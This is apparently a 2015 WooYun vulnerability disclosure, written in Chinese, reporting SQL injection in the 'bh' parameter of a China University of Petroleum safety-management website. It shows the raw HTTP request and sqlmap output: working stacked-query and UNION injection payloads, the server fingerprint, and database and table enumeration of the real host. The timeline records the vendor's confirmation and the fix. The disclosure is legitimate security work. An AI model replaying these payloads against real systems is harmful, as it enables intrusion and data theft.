乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-09: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
http://safety.upc.edu.cn/ 中国石油大学(华东)资产设备处技术安全管理信息系统
GET /info/Inspect/View.aspx?bh=yITcTAYL HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://safety.upc.edu.cnHost: safety.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
bh参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: bh (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: bh=yITcTAYL';WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: bh=yITcTAYL' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(105)+CHAR(102)+CHAR(80)+CHAR(74)+CHAR(112)+CHAR(77)+CHAR(74)+CHAR(105)+CHAR(106)+CHAR(90)+CHAR(104)+CHAR(81)+CHAR(109)+CHAR(110)+CHAR(73)+CHAR(105)+CHAR(81)+CHAR(100)+CHAR(105)+CHAR(68)+CHAR(100)+CHAR(69)+CHAR(86)+CHAR(85)+CHAR(113)+CHAR(114)+CHAR(99)+CHAR(88)+CHAR(76)+CHAR(76)+CHAR(84)+CHAR(68)+CHAR(104)+CHAR(74)+CHAR(73)+CHAR(103)+CHAR(67)+CHAR(108)+CHAR(117)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000available databases [19]:[*] 123[*] 321[*] Ddjl[*] gdjc[*] iplist[*] kaoqin[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] ribaobiao[*] scjd[*] siteserver[*] slzy[*] tempdb[*] TradeUnion[*] UPCTECSAFDB[*] wsc
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000Database: UPCTECSAFDB+---------------------+---------+| Table | Entries |+---------------------+---------+| dbo.WXHXPXXB | 3777 || dbo.sysconstraints | 600 || dbo.TLFBB | 323 || dbo.DWXXB | 261 || dbo.sydxdwbm | 257 || dbo.TZSB_JYB | 248 || dbo.AQWHB | 246 || dbo.JBDMB | 168 || dbo.YHZQXB | 123 || dbo.QXJBXXB | 102 || dbo.TZSB_JBXXB | 97 || dbo.TZSBZCDJB | 96 || dbo.DMLBB | 53 || dbo.MBXXB | 43 || dbo.GLJYB | 37 || dbo.QPJHXXB | 29 || dbo.YQLJB | 28 || dbo.QZJJSCSB | 27 || lijun.D99_Tmp | 26 || dbo.TWSJBXXB | 24 || dbo.TZSB_RYXXB | 24 || dbo.TZSB_RYPXB | 22 || dbo.YJFAB | 17 || dbo.JDJCB | 15 || dbo.GLDJKB | 14 || dbo.GLDJK_JBXXB | 9 || dbo.JDJCHZFJB | 9 || dbo.TZSB_RYFLB | 8 || dbo.YHDYZB | 6 || dbo.AQWHLBB | 5 || dbo.SXZZJBXXB | 5 || dbo.YLRQJYB | 5 || dbo.YQLJLBB | 5 || dbo.GLBGB | 4 || dbo.QXLBB | 4 || dbo.TLFGLBB | 4 || dbo.TWSSXZZ_SCHTFJB | 4 || dbo.AQWHFJB | 3 || dbo.CNJCJSCSB | 3 || dbo.syssegments | 3 || dbo.YHXXB | 3 || dbo.YHZB | 3 || dbo.YJJYZJB | 3 || dbo.TWSSXZZ_SCHTB | 2 || dbo.DTJSCSB | 1 || dbo.lulu | 1 || dbo.YLRQDJK_JBXXB | 1 || dbo.YLRQDJK_JBXXB | 1 |+---------------------+---------+
危害等级:中
漏洞Rank:8
确认时间:2015-11-23 15:12
感谢您对中国石油大学的网络安全的关注,我们会尽快解决该问题。
2015-12-09:该网站已关闭,感谢您对中国石油大学网络信息安全的关注。